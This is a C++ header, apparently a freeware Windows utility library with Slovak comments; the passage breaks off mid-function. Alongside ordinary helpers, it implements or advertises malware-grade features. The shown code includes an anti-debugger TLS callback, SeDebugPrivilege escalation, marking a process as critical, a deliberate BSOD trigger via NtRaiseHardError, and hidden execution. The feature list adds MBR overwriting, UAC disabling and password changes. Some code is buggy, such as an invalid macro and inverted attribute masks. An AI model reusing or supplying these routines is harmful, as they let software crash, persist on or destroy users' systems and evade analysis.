/**
 * @mainpage
 *
 * @section INFORMÁCIE
 * @author  Patrik Slučiak | Diallix (c)
 * @date    17.15 2020
 * @version 26.6
 *
 * @section POPIS
 *
 * Tento modul bol vytvorený ako pomocný modul s užitočnými metódami pre prácu pod systémom MS Windows.
 * Funkcie knižnice využívajú systémové volania __WinAPI__ pre prístup a správu.
 * Ďaľšie užitočné funkcie budem postupne verziami dopĺňať.
 *
 * __Podporované funkcie:__
 *
 * * _Nastavenie zobrazenia okna konzolovej aplikácie_
 *
 * * _Načítanie a spracovanie dát v resources_
 *
 * * _Nastavenie súborových atribútov_
 *
 * * _Zistenie práv spustenia súboru_
 *
 * * _Nastavenie úrovne System Integrity_
 *
 * * _Vyčistenie obrazovky_
 *
 * * _Funkcia pre spustenie aplikácie_
 *
 * * _Funkcia pre zistenie pripojenia_
 *
 * * _Funkcia pre rekurzívne vytvorenie adresára/podadresárov_
 *
 * * _Funkcia pre vytvorenie súbora_
 *
 * * _Funkcia pre zrušenie obsahu súbora_
 *
 * * _Funkcia pre zistenie súbora_
 *
 * * _Funkcia pre zistenie veľkosti súbora_
 *
 * * _Funkcia pre načítanie aktuálneho systémového času_
 *
 * * _Funkcia pre uplodnutie súboru na FTP_
 *
 * * _Funkcia pre stiahnutie obsahu z url do definovaného priečinku_
 *
 * * _Funkcia pre zmenu veľkosti vstupného stringu. Vstupnú sekvenciu slov mení funkcia na veľké_
 *
 * * _Funkcia pre získanie koncoviek z názvov súborov_
 *
 * * _Funkcia pe získanie názvu lokálneho počítača_
 *
 * * _Funkcia pre načítanie obrázku typu bitmap do operačnej pamäte_
 *
 * * _Funkcia pre stiahnutie obsahu z danej url_
 *
 * * _Funkcia na správu UAC nastavení_
 *
 * * _Funkcia pre nastavenie procesu ako kritického_
 *
 * * _Funkcia pre vyvolanie výnimky BSOD_
 *
 * * _Funkcia na vloženie záznamu do Active Setup_
 *
 * * _Funkcia na pridanie výnimky do firwallu_
 *
 * * _Definovanie makra pre ochranu súboru pred debuggermi_
 *
 * * _Funkcia pre zobrazenie názvov aktívnych okien procesov_
 *
 * * _Funkcia na nastavenie roku, dátumu a času pre súbor_
 *
 * * _Funkcia na nastavenie hesla aktualného konta a konta Asministrátora_
 *
 * * _Funkcia pre získanie názvov všetkých pripojených jednotiek - disky, pamäťové média_
 *
 * * _Funkcia pre interaktívne spustenie súbora, napríklad z NT služby_
 *
 * * _Funkcia ktorá nám vytvorí nové okno desktopu do ktorého sa následne prepne_
 *
 * * _Funkcia ktorá nám fixne zminimalizuje okno programu do TRAY lišty_
 *
 * * _Funkcia pre zistenie verzie operačného systému_
 * 
 * * _Funkcia pre vytvorenie bodu obnovy_
 * 
 * * _Funkcia pre prepísanie MBR Sektoru_
 * 
 * * _Funkcia pre zistenie existencie zložky_
 * 
 * * _Funkcia pre spustenie novej inštancie súboru_
 *
 * * _Funkcia pre zmazanie programu (samého seba)_
 *
 * * _Funkcia pre vytvorenie Bodu Obnovy_
 *
 * * _Funkcia pre prepísanie MBR Sektoru_
 *
 * * _Funkcia pre zistenie existencie zložky_
 * 
 * * _Funkcia pre zistenie názvu programu z umiestnenia_
 *
 * * _Funkcia pre spustenie novej inštancie súbora ako procesu_
 *
 *
 ** Vývojové prostredie: _Microsoft Visual Studio 2010_
 *
 * @section LICENCIA
 *
 * Modul je uverejnený bez komerčnej politiky ako free-ware a je duševným vlastníctvom autora __Patrik Slučiak | Diallix (C)__, ďalej len Autor.
 * Je výslovne zakázané privlastnovanie si a propagovanie pod vlastným menom tento modul, vrátanie komerčného šírenia a propagovania bez ďalšieho súhlasu Autora.
 * 
 * Návod a príkladové použitie modulu "WinApi.h" je k dispozícií : https://www.netbot.sk/sk/14-blog-headers/31-winapi
 * Pripomienky / Návrhy, prosím, píšte na diallix@diallix.net .
 * 
 * 
 * 
 */
/**
 * @file WinAPI.h
 * @brief Zdrojový súbor WinAPI.h
 *
 * 01.05 2014 - Prvná verzia
 *
 * 17.10 2020 - Posledná verzia
 */

/**
 * @def Definovanie identifikátorov knižnice "WinAPI.h".
 */
//! Definovanie identifikátorov knižnice "WinAPI.h".

#define _Diall_WinAPI_ 4432264
#define _WinAPI_ _Diall_WinAPI_
#define _WINAPI_H

#if defined(_WIN64)
	#define ACCESS_NODE KEY_WOW64_32KEY
#else
	#define ACCESS_NODE KEY_WOW64_64KEY
#endif

#if !defined(NULL)
  #define NULL 0
#endif

#ifndef null
	#define null NULL
#endif

#ifndef CNULL
	#define CNULL '\0'
#endif

#ifndef cnull
	#define cnull CNULL
#endif

#ifndef nul
	#define nul CNULL
#endif

#ifndef NUL
	#define NUL CNULL
#endif

#ifndef _WINDOWS_
	#include <windows.h>
#endif

#ifndef _IOMANIP_
	#include <iostream>
#endif

#ifndef _FSTREAM_H
	#include <fstream>
#endif

#ifndef _WINHTTPX_
	#include <wininet.h>
#endif

#ifndef TIME_H
	#include <time.h>
#endif 

#ifndef DIRECT_H
	#include <direct.h>
#endif 

#ifndef LIST_H
	#include <list>
#endif

#ifndef __IO_H__
	#include <io.h>
#endif

#ifndef _SHLOBJ_H
	#include <ShlObj.h>
#endif

#ifndef _INC_SETUPAPI
	#include "Setupapi.h"
#endif

#ifdef  _SETUPAPI_H_
	#undef  _SETUPAPI_H_
#endif

#ifndef _PSAPI_H
	#include <psapi.h>
#endif

#ifndef _TLHELP32_H
	#include "TlHelp32.h"
#endif

#include <lm.h>

#include <sys/stat.h>

#ifndef DIRENT_H
	#include "dirent.h" //https://github.com/tronkko/dirent/blob/master/include/dirent.h
#endif

#include <functional>
#include <string>
#include <iostream>
#include <sstream> 

#ifdef _UNICODE
	#define _T(x)      L ## x
#else
	#define _T(x)      x
#endif

#include <atlexcept.h>

#define _ATL_NO_EXCEPTIONS
#define _ATL_CUSTOM_THROW

	//#include <atlbase.h>

#include <tchar.h>
#include <atlconv.h>
#include <accctrl.h>
#include <aclapi.h>
#include <objbase.h>
#include <strsafe.h>
#include <srrestoreptapi.h>
#include <ctime>

#ifndef VECTOR_H
	#include <vector>
#endif

#ifndef __WINE_WTSAPI32_H
	#include <wtsapi32.h>
#endif

#define __IN__			__allowed(on_parameter)
#define	__OUT__			__allowed(on_parameter)
#define	_IM_			__allowed(on_parameter)  
#define	_OUT_			__allowed(on_parameter)
#define __in__			__allowed(on_parameter)
#define	__out__			__allowed(on_parameter)
#define	_in_			__allowed(on_parameter)
#define	_out_			__allowed(on_parameter)

#ifndef __buffer__
	#define __buffer__ 687
#endif

#ifndef __us_size__
	#define __us_size__ 10000
#endif

#define CurrentProcess() (HANDLE)-1

#if _WIN32 || _WIN64
	#if _WIN64
		#define ENVIRONMENT64
	#else
		#define ENVIRONMENT32
	#endif
#endif

// Check GCC
/*#if __GNUC__
#if __x86_64__ || __ppc64__
#define ENVIRONMENT64
#else
#define ENVIRONMENT32
#endif
#endif*/

//#ifdef ENVIRONMENT32
	#ifdef _M_X64
		#define RgisterInformationBlock __readfsdword(0x30)+2
	#else
		#define RgisterInformationBlock __readfsdword(0x18)+2
	#endif
//#endif

/*#ifdef ENVIRONMENT64
	#ifdef _M_X64
		#define RgisterInformationBlock __readgsqword(0x30)+2
	#else
		#define RgisterInformationBlock __readgsqword(0x18)+2
	#endif
#endif*/


#define AdjustPrivilegeCritical 20
#define AdjustPrivilegeBSOD 19
#define UserInfoPassword 1003

/**
 * @def Definovanie promakier linkeru.
 */
//! Definovanie promakier linkeru.
#pragma comment(lib, "psapi.lib" )
#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "Setupapi.lib")
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "wininet")
#pragma comment(lib, "Winmm.lib")
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "Netapi32.lib")
#pragma comment(lib, "Advapi32.lib")
#pragma comment(lib, "Wtsapi32.lib")
#pragma comment(lib, "ole32.lib")

#pragma comment(lib, "ntdll.lib")

//#pragma comment(linker, "/include:__tls_used")

#ifdef _WIN64
     #pragma comment (linker, "/include:_tls_used")
#else
     #pragma comment (linker, "/include:__tls_used")
#endif

#pragma section(".CRT$XLB", read)

typedef BOOL (WINAPI *PFN_SETRESTOREPTW) (PRESTOREPOINTINFOW, PSTATEMGRSTATUS);

extern "C" 
{ 
	NTSTATUS _stdcall RtlAdjustPrivilege(::ULONG,::BOOLEAN,::BOOLEAN,::PBOOLEAN);
	NTSTATUS _stdcall NtSetInformationProcess(::HANDLE,::ULONG,::PVOID,::ULONG);
	NTSTATUS _stdcall NtQueryInformationProcess(::HANDLE,::ULONG,::PVOID,::ULONG,::PULONG);
	NTSTATUS _stdcall NtRaiseHardError(::NTSTATUS,::ULONG,::ULONG OPTIONAL,::PULONG_PTR,::ULONG,::PULONG);
}

#ifdef _ProtectDebugger_
	void DProtectDebuggerDetected(void);
	void DProtectDebuggerNoDetected(void);
#endif
	
void _stdcall TLSCallBackHook(::PVOID Module,::DWORD Reason,::PVOID Context)
{
	::PBOOLEAN StartDebugged = (::PBOOLEAN) RgisterInformationBlock;
	::HANDLE DebugPort = nullptr;
	bool isdebugged = false;

	if(*StartDebugged)
	{
		isdebugged = true;
	}
	else
	{
		isdebugged = false;
	}

	if(!::NtQueryInformationProcess(CurrentProcess(), 7, &DebugPort, sizeof(::HANDLE), NULL))
	{
		if(DebugPort)
		{	
			isdebugged = true;
		} else
		{
			isdebugged = false;
		}
	}

	if(isdebugged == true)
	{
		#ifdef _ProtectDebugger_
			DProtectDebuggerDetected();
		#endif
	} else 
	{
		#ifdef _ProtectDebugger_
			DProtectDebuggerNoDetected();
		#endif
	}
}

/**
 * @def Definovanie promakra _ProtectDebugger_ na ochranu suboru pred debuggermi_
 */
//! Definovanie makra pre ochranu suboru pred debuggermi
#ifdef _ProtectDebugger_
	    __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK PIMAGETLSCALLBACK[2]={TLSCallBackHook, nullptr};
#endif

using namespace std;

#ifndef MAX_PATH
	#define MAX_PATH 260
#endif

#ifndef INFINITE
	#define 0xFFFFFFF
#endif

#ifndef nulladdress
	#define nulladdress nullptr
#endif

#ifndef stdcall
	#define stdcall __stdcall
#endif

#ifndef WINAPI
	#define WINAPI __stdcall
#endif

#ifndef winapi
	#define winapi WINAPI
#endif

#ifndef cdecl
	#define cdecl __cdecl
#endif

#ifndef thiscall
	#define thiscall __thiscall
#endif

#ifndef fastcall
	#define fastcall __fastcall
#endif

#ifndef naked
	#define naked __naked
#endif

struct stat stat_buf;
struct tm times;

//! NameSpace Diall_WIN
namespace Diall_WinApi {

#define MBR_SIZE 512

/**
 * BOOL __stdcall FindActiveWindowTitle(::HWND d_hwnd, ::LPARAM lparam)
 *
 * @brief Funkcia pre zobrazenie názvov aktívnych okien procesov.
          Funkcia je volaná ako _CallBack_ a môže byť spustená pomocou EnumWindows(::Diall_WinApi::FindActiveWindowTitle, 45);.
 *
 */
	BOOL __stdcall FindActiveWindowTitle(::HWND d_hwnd, ::LPARAM lparam)
	{
		::TCHAR WindowTitleBuffer[5000];
		::GetWindowText(d_hwnd, WindowTitleBuffer, 5000);

		int d_size = ::GetWindowTextLength(d_hwnd);

		::wstring d_tmp(&WindowTitleBuffer[0]);
		::string windowtitle(d_tmp.begin(), d_tmp.end());

		if (d_size == 0 || !::IsWindowVisible(d_hwnd)) 
		{
			return true;
		}

		::std::cout << windowtitle << endl;
	}

	int ActiveWindowByTitleCount = 0;
	char * FindWindowByTitle = "";

	BOOL CALLBACK FindActiveWindowByTitle(HWND hwnd, LPARAM lParam)
	{
		char buffer[256];
		int written = GetWindowTextA(hwnd, buffer, 256);
		if (written && strstr(buffer, FindWindowByTitle) != NULL) 
		{
			ActiveWindowByTitleCount++;
		}
			return TRUE;
	}

	enum SystemAccess:DWORD {
		SYSTEMACCESS1 = 0x80000000,
		SYSTEMACCESS2 = 0x40000000,
		SYSTEMACCESS3 = 0x00000001,
		SYSTEMACCESS4 = 0x00000002,
		SYSTEMACCESSA = 0x40000000,
	    SYSTEMACCESSB = 0x20000000
	};

	enum EraseMasterBootSector:int {
		AllDevices = 1,
		DefinedDevice = 2
	};

/// Enum trieda "InTrayBar" definujúca možnosti minimalizovania programu do tray lišty.
	enum InTrayBar:DWORD {
		Active = 1, ///< Definuje operáciu nastavenia minimalizácie programu do tray lišty.
		Deactive = 0 ///< Definuje operáciu nastavenia maximalizácie programu z tray lišty.
	};

/// Enum trieda "FileAttribute" definujúca možnosti nastavenia súborových atribútov.
	enum FileAttribute {
		HIDDEN, ///< Definuje operáciu nastavenia atribútu ako HIDDEN (Skrytý).
		READONLY, ///< Definuje operáciu nastavenia atribútu ako READONLY (Iba na čítanie).
		SYSTEM, ///< Definuje operáciu nastavenia atribútu ako SYSTEM (Systémový).
		NORMAL,  ///< Definuje operáciu nastavenia atribútu ako NORMAL (Defaultný Atribút).
		HIDDEN_READONLY_SYSTEM ///< Definuje operáciu nastavenia atribútov HIDDEN-READONLY-SYSTEM.
	};

/// Enum trieda "BreakTermination" definujúca možnosti nastavenia Information Process.
	enum CriticalPrivilege:ULONG {
		EnableCriticalPrivilege = 1, ///< Definuje nastavenie kritickeho procesu.
		DisableCriticalPrivilege = 0 ///< Nedefinuje nastavenie kritickeho procesu..
	};

/// Enum trieda "Privilege" definujúca možnosti nastavenia úrovne System Integrity.
	enum Privilege {
		ENABLE, ///< Definuje povolenie úrovne System Integrity.
		DISABLE ///< Definuje zakázanie úrovne System Integrity.
	};

/// Enum trieda "UACManage" definujúca možnosti nastavenia úrovne System UAC.
	enum UACManage:DWORD {
		Set_ENABLE = 1, ///< Definuje povolenie UAC.
		Set_DISABLE = 0 ///< Definuje zakázanie UAC.
	};

/// Enum trieda "SelfWindows" definujúca možnosti nastavenia zobrazenia/skrytia aplikácie.
	enum SelfWindow:int {
		SHOW = 1, ///< Definuje zobrazenie konzolovej aplikácie.
		HIDE = 2 ///< Definuje skrytie konzolovej aplikácie na pozadí systému.
	};

/*! \brief Trieda "Diall_Method" pre prácu so súbormi a systémom knižnice "WinAPI.h".
 *  
 *
    \brief Trieda implementujúca užitočné metódy pre prácu so súbormi, dátami, systémom...
 *         Trieda využíva volania __WinAPI__.
 */
	class WinApi {
	
	private:

		::BYTE * dData;
		::CONSOLE_SCREEN_BUFFER_INFO console_screen;
		::COORD console_position_cls;
		::DWORD console_show;
	    ::DWORD dresult;
		::DWORD atribute_H;
		::DWORD atribute_R;
		::DWORD atribute_S;
		::DWORD atribute_N;
		::DWORD cbSize;
		::DWORD distate;
		::HANDLE dHandle;
		::HANDLE dconsole_cls;
		::HGLOBAL dGlobal;
		::HRSRC dResource;
		::HRESULT hresult;
		::HWND console_applications;
	    ::IStream * dstram;
		::LPCWSTR section;
		::LPCWSTR path;
		::LPWSTR wUserName;
		::LUID dLuid;
		::std::string debug_error;
		::std::fstream saveresfile;
		::TOKEN_PRIVILEGES dPrivileges;
		::TOKEN_ELEVATION dElevation;
		::DWORD attributes;
		::list<::std::string> fLevel;
		bool result;
		int size;
		int id;
		char * createfolder;
		char * f_ptr;
		char * testurlconnectivity;
		wchar_t * convertstring;

		public:
		::BYTE * resourcedata;
		int resourcesize;

		private:

		static WinApi * instance;

		//GetDriverLabel//
		::std::vector <::std::string> volumelabels;
        public:
        ::std::vector <::std::string> fixeddrives;
        ::std::vector <::std::string> removabledrives;
        private:
		::HANDLE hDevice;
		char drv;
		const char *charDrv;
		//-------------//

		//Call process form services//
		::HANDLE hToken, hProcess, hPToken, hUserTokenDup;
		::HDESK hdesk;
	  	::HWINSTA hwinsta;
		::HWINSTA hwinstaSave;
		::PROCESS_INFORMATION pi;
		::PSID pSid;
		::STARTUPINFO si;
		bool bQueryUserToken;
		//------------------------//

		//TrayIcon//
		::NOTIFYICONDATA notifyTrayIcon;
        ::HWND hwndTray;
		//-------//

		//MBR//
		DWORD MBRDword;
        HANDLE MasterBootRecord;
		BYTE * MBR_CONTENT;
		//--//

	public:

/**
 * @fn WinApi * GetInstance() 
 *
 * @brief Metóda pre prístup cez inštanciu - Singleton.
 */
		static WinApi * GetInstance(void)
		{
			if(!instance)
			{
				instance = new WinApi();
			}
			return instance;
		}

	private:

/**
 * @fn WinApi (void) 
 *
 * @brief Privátny konštruktor.
 */
		WinApi(void)
		{
			this->dstram = nulladdress;
			this->createfolder = nulladdress;
			this->f_ptr = nulladdress;
			this->testurlconnectivity = nulladdress;
			this->dstram = nulladdress;
			this->result = false;
			this->size = 0;
			this->dData = nulladdress;
			this->dResource = nulladdress;
			this->dGlobal = nulladdress;
			this->atribute_H = ~FILE_ATTRIBUTE_HIDDEN;
	        this->atribute_R = ~FILE_ATTRIBUTE_READONLY;
	        this->atribute_S = ~FILE_ATTRIBUTE_SYSTEM;
	        this->atribute_N =  FILE_ATTRIBUTE_NORMAL;
			this->distate = 0;
			this->dconsole_cls = ::GetStdHandle(STD_OUTPUT_HANDLE);
			this->console_position_cls.X = 0;
			this->console_position_cls.Y = 0;
			this->cbSize = sizeof(TOKEN_ELEVATION);
			this->debug_error = "NONE";
			this->testurlconnectivity = "http:\\www.google.com";
			
			this->hdesk = NULL;
		  	this->hwinsta = NULL;
            this->hwinstaSave = NULL;
			this->pSid = NULL;
			this->bQueryUserToken = false;

			this->MBRDword = NULL;
            this->MasterBootRecord = NULL;
			this->MBR_CONTENT = new byte[MBR_SIZE];

			this->resourcedata = NULL;
			this->resourcesize = 0;
		}

	public:

/**
 * @fn void PrintDebugError(void) 
 *
 * @brief Metóda pre zobrazenie chýb pri využívaní funkcií triedy Diall_Method.
 */
		void PrintDebugError(void)
		{
			::std::cout<<::std::endl<<::std::endl;
			::std::cout<<"\n    Result of debugging   ";

			if(sizeof(this->debug_error)/sizeof(::std::string)>0)
			{
				::std::cout << "   --> " <<this->debug_error;
			}
			else
			{
				::std::cout <<"   No errors " << this->debug_error;
			}
			::std::cout<<::std::endl<<::std::endl;
		}
		
/**
 * void WindowOfConsoleApplication(SelfWindows selfoperation)
 *
 * @brief Funkcia pre nastavenie zobrazenia okna konzolovej aplikácie.
 *
 * @param selfoperation Povinná vstupná hodnota reprezentujúca typ nastaveného atribútu. Hodnota môže nadobúdať jednu z hodnôt definovaných v __SelfWindows__, napríklad: _SelfWindows::Show_.
 *
 */
		void WindowOfConsoleApplication(SelfWindow selfoperation)
		{
			this->console_applications = ::GetConsoleWindow();

			if(selfoperation == SelfWindow::SHOW)
			{
				::ShowWindow(console_applications,SW_SHOW);
			} else
			{
				::ShowWindow(console_applications,SW_HIDE);
			}
		}

/**
 * bool ResourceLoad(int id, LPCWSTR section, LPCWSTR path, HMODULE instance)
 *
 * @brief Funkcia pre načítanie dát z resources.
 *
 * @param id Povinná vstupná hodnota reprezentujúca označenie uloženého súboru v resources.
 *
 * @param section Povinná vstupná hodnota reprezentujúca sekciu/typ danej resources.
 *
 * @param path Povinná vstupná hodnota reprezentujúca cestu uloženia súboru z resources.
 *
 * @param instance Povinná vstupná hodnota reprezentujúca inštanciu dátového zdroja, odkiaľ sa majú dáta načítať.
                   Ak sú dáta-resource uložené v tom istom súbore projektu, z ktorého je knižnica includovaná,
	               zadáva sa parameter NULL. Príklad použitia: http://www.diallix.net/ndex.php?option=com_content&view=article&id=161&Itemid=139 .
 *
 * @return Funkcia vracia pravdivostnú hodnotu úspešnosti spracovania.
 */
		void Load_Resource(int id, LPCWSTR section, LPCWSTR path, ::HMODULE instance)
		{
			::HRSRC dResource = ::FindResource(instance, MAKEINTRESOURCE(id), section);
			::HGLOBAL dGlobal = ::LoadResource(instance, dResource);
			BYTE* dData = (BYTE*)::LockResource(dGlobal);
			int size = ::SizeofResource(instance, dResource);

			this->resourcedata = dData;
			this->resourcesize = size;

			::std::fstream save_file;
			save_file.open(path, std::ios::out | std::ios::binary);
			save_file.write((const char*)dData, size);

			::FreeResource(dGlobal);

		}

		bool ResourceLoad(int id, ::LPCWSTR section, ::LPCWSTR path, ::HMODULE instance)
		{
			this->resourcedata = NULL;
			this->resourcesize = 0;
			this->id = id;
			this->section = section;
			this->path = path;
			this->dResource = ::FindResource(instance, MAKEINTRESOURCE(this->id), this->section);

			if(this->dResource == NULL)
			{
				this->debug_error = "The resource Was not Found";
				return false;
			}

			this->dGlobal = ::LoadResource(instance, this->dResource);

			if(this->dGlobal == NULL)
			{
				this->debug_error = "The resource Was not Load";
				return false;
			}

			this->resourcedata = (::BYTE*)::LockResource(dGlobal);
			this->resourcesize = ::SizeofResource(instance, dResource);

			if(path!= L"null")
 			{
				//::std::fstream saveresfile;
				this->saveresfile.open(this->path, ::std::ios::out | ::std::ios::binary);
				this->saveresfile.write((const char*)this->resourcedata, this->resourcesize);
				this->saveresfile.close();
			}
			
			::FreeResource(this->dGlobal);
			this->debug_error = "";

			return true;
		}

		::BYTE * GetResourceData(void)
		{
			return this->resourcedata;
		}

		int GetResourceSize(void)
		{
			return this->resourcesize;
		}

/**
 * bool SetAttrib(LPCWSTR path, FileAttribute attrib)
 *
 * @brief Funkcia pre nastavenie systémových atribútov danému súboru.
 *
 * @param path Povinná vstupná hodnota reprezentujúca cestu so súborom.
 *
 * @param attrib Povinná vstupná hodnota reprezentujúca typ nastaveného atribútu. Hodnota môže nadobúdať jednu z hodnôt definovaných v __FileAttribute__, napríklad: _FileAttributev::HIDDEN_.
 *
 * @return Funkcia vracia pravdivostnú hodnotu úspešnosti spracovania.
 */
		bool SetAttrib(::LPCWSTR path, FileAttribute attrib)
		{
			switch(attrib)
			{
			case FileAttribute::HIDDEN:
				this->result = ::SetFileAttributes(path, this->atribute_H);
				break;
			case FileAttribute::NORMAL:
				this->result = ::SetFileAttributes(path, this->atribute_N);
				break;
			case FileAttribute::READONLY:
				this->result = ::SetFileAttributes(path, this->atribute_R);
				break;
			case FileAttribute::SYSTEM:
				this->result = ::SetFileAttributes(path, this->atribute_S);
				break;
			case FileAttribute::HIDDEN_READONLY_SYSTEM:
				this->result = ::SetFileAttributes(path, this->atribute_H);
				this->result = ::SetFileAttributes(path, this->atribute_R);
				this->result = ::SetFileAttributes(path, this->atribute_S);
				break;
			}
			return this->result;
		}

/**
 * bool IsAdminExec(void)
 *
 * @brief Funkcia zistenia práv spustenia súboru.
 *
 * @return Funkcia vracia pravdivostnú hodnotu _TRUE_, ak bol daný program spustený pod administátorským oprávnením. V opačnom prípade vracia
           hodnotu _FALSE_.
 */
		bool IsAdminExec(void) 
		{
			this->result = false;
			this->dHandle = NULL;

			if(::OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, & this->dHandle)) 
			{				
				if(::GetTokenInformation(this->dHandle, TokenElevation, & this->dElevation, sizeof(dElevation), & cbSize)) 
				{
					this->result = this->dElevation.TokenIsElevated;
				}
			}

			if(this->dHandle) 
			{
				::CloseHandle(this->dHandle);
			}
			return this->result;
		}

/**
 * int SystemIntegrity(Privilege privilege)
 *
 * @brief Funkcia pre nastavenie úrovne System Integrity.
 *
 * @param privilege Povinná vstupná hodnota reprezentujúca povolenie/zakázanie úrovne. Hodnota môže nadobúdať jednu z hodnôt definovaných v __Privilege__, napríklad: _Privileg::ENABLE_.
 *
 * @return Funkcia vracia hodnotu "2" pri úspešnom povolení úrovne, "1" pri úspešnom zakázaní úrovne. Pri chybe funkcia vracia ´poslednú chybu zlyhaného modulu.
 */
		int SystemIntegrity(Privilege privilege)
		{
			if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, & this->dHandle))
			{
				this->dresult = ::GetLastError();
				return this->dresult;
			}

			if (!::LookupPrivilegeValue(NULL, SE_DEBUG_NAME, & this->dLuid))
			{
				this->dresult = ::GetLastError();
				return this->dresult;
			}

			this->dPrivileges.PrivilegeCount = 1;
			this->dPrivileges.Privileges[0].Luid = this->dLuid;

			if(privilege == Privilege::DISABLE)
			{
				this->dresult = 1;
				this->dPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
			} else 
			{
				if(privilege == Privilege::ENABLE)
				{
					this->dresult = 2;
					this->dPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
				}
			}

			if (!::AdjustTokenPrivileges(this->dHandle, FALSE, & this->dPrivileges, sizeof(this->dPrivileges), NULL, NULL))
			{
				this->dresult = ::GetLastError();
				return this->dresult;
			}

			::CloseHandle(this->dHandle);

			this->InitializeCOMSecurity();

			return this->dresult;
		}

/**
 * NTSTATUS SetCriticalProcess(CriticalPrivilege isset)
 *
 * @brief Funkcia pre nastavenie procesu ako kritického.
 *
 * @param isset Povinná vstupná hodnota reprezentujúca povolenie/zrušenie procesu ako kritického. Hodnota môže nadobúdať jednu z hodnôt definovaných v __CriticalPrivilege__, napríklad: _Privileg::EnableCriticalPrivilege_.
 *
 * @return Funkcia vracia hodnotu "NTSTATUS".
 */
		NTSTATUS SetCriticalProcess(CriticalPrivilege isset)
		{
			::NTSTATUS status;

			this->SetAdjustPrivilegeCritical();

			if(isset == CriticalPrivilege::EnableCriticalPrivilege)
			{
				status = NtSetInformationProcess(CurrentProcess(),0x1d,&isset,sizeof(ULONG));
			} else if(isset == CriticalPrivilege::DisableCriticalPrivilege)
					{
						status = NtSetInformationProcess(CurrentProcess(),0x1d,&isset,sizeof(ULONG));
					}
			return status;
		}

/**
 * NTSTATUS CallBSODError(void)
 *
 * @brief Funkcia pre vyvolanie vynimky BSOD.
 *
 * @return Funkcia vracia hodnotu "NTSTATUS".
 */
		NTSTATUS CallBSODError(void)
		{
			::ULONG ubret;
			::NTSTATUS status;

			this->SetAdjustPrivilegeBSOD();
			status = ::NtRaiseHardError(STATUS_FLOAT_MULTIPLE_FAULTS, 0, 0, 0, 6, &ubret);

			return status;
		}
/**
 * @fn void ClearConsole(void) 
 *
 * @brief Metóda pre vyčistenie obrazovky.
 */
		void ClearConsole(void)
		{
			::GetConsoleScreenBufferInfo(this->dconsole_cls, & this->console_screen);
			::FillConsoleOutputCharacterA(this->dconsole_cls,' ', this->console_screen.dwSize.X * this->console_screen.dwSize.Y, this->console_position_cls, & this->console_show);
			::FillConsoleOutputAttribute(this->dconsole_cls, FOREGROUND_GREEN | FOREGROUND_RED | FOREGROUND_BLUE, this->console_screen.dwSize.X * this->console_screen.dwSize.Y, this->console_position_cls, & this->console_show);
			::SetConsoleCursorPosition(this->dconsole_cls, this->console_position_cls);
		}
		
/**
 * void ExecuteFile(::std::string filepath, ::std::string params, SelfWindow ishide)
 *
 * @brief Funkcia pre spustenie aplikácie.
 *
 * @param filepath Povinná vstupná hodnota reprezentujúca cestu so súborom, ktorý chceme spustiť.
 *
 * @param params Povinná vstupná hodnota reprezentujúca parametre, ktorými sa súbor spustí.
 *
 * @param ishide Povinná vstupná hodnota nastavujúca okno spusteného súboru. Hodnota môže nadobúdať jednu z hodnôt definovaných v __SelfWindow__, napríklad: _SelfWindow__::Show_.
 *
 */
		void ExecuteFile(::std::string filepath, ::std::string params, SelfWindow ishide)
		{
			if(ishide == SelfWindow::HIDE)
			{
				::ShellExecute(NULL, _T("open"), this->String_To_LPCWSTR(filepath), this->String_To_LPCWSTR(params), NULL, SW_HIDE);
			} else {
				::ShellExecute(NULL, _T("open"), this->String_To_LPCWSTR(filepath), this->String_To_LPCWSTR(params), NULL, SW_SHOW);
			}
			this->String_To_LPCWSTR_DELETE();
		}

/**
 * bool IsConnection(void)
 *
 * @brief Funkcia pre zistenie pripojenia.
 *
 * @return Funkcia vracia hodnotu "true" pri úspešnom pripojení. Pri chybe funkcia vracia hodnotu "false".
 */
	    bool IsConnection(void)
		{
			::IStream * istream;
			::URLOpenBlockingStreamA(0, this->testurlconnectivity, & istream, 0, 0);

			if (!istream && !::InternetGetConnectedState( & distate, 0)) 
			{
				return false;
			} else 
			{
				return true;
			}
		}
		
/**
 * bool CreateFolder(::std::string folderlocation)
 *
 * @brief Funkcia pre rekurzívne vytvorenie adresára/podadresárov.
 *
 * @param folderlocation Povinná vstupná hodnota reprezentujúca cestu ku zložke. Vytvorí všetky nadzložky vo vstupnej ceste.
 *
 * @return Funkcia vracia hodnotu "true" pri úspešnom vytvorení. Pri chybe funkcia vracia hodnotu "false".
 */
		bool CreateFolder(::std::string folderlocation) 
		{
			this->createfolder = (char*)folderlocation.c_str();
			this->f_ptr = & this->createfolder[strlen(this->createfolder) - 1];

			do {
				if(this->FolderExists(this->createfolder)) 
				{
					break;
				}
				do {
					this->f_ptr--;
				} while ((*this->f_ptr != '\\') && (*this->f_ptr != '/') && (this->f_ptr >= this->createfolder));

				this->fLevel.push_front(::std::string(this->f_ptr + 1));
				this->f_ptr[1] = 0;
			} while (this->f_ptr >= this->createfolder);

			if (::_chdir(this->createfolder)) 
			{   
				return true;
			}

			for (::list<::std::string>::iterator ite = this->fLevel.begin(); ite != this->fLevel.end(); ite++) 
			{
				if (::CreateDirectory(this->String_To_LPCWSTR(ite->c_str()), NULL) == 0)
				{
					this->String_To_LPCWSTR_DELETE();
					return true;
				}
				this->String_To_LPCWSTR_DELETE();
				::_chdir(ite->c_str());
			}

			return false;
		}

/**
 * bool 
File(char * file, char * buffer, int size)
 *
 * @brief Funkcia pre vytvorenie súbora.
 *
 * @param file Povinná vstupná hodnota reprezentujúca cestu s názvom súbora.
 *
 * @param buffer Povinná vstupná hodnota reprezentujúca obsah dátového bufferu.
 *
 * @param size Povinná vstupná hodnota reprezentujúca veľkosť.
 *
 * @return Funkcia vracia hodnotu "true" pri úspešnom vytvorení. Pri chybe funkcia vracia hodnotu "false".
 */
		bool CreateFile(char * file, char * buffer, int size)
		{
			::DWORD dwRet;
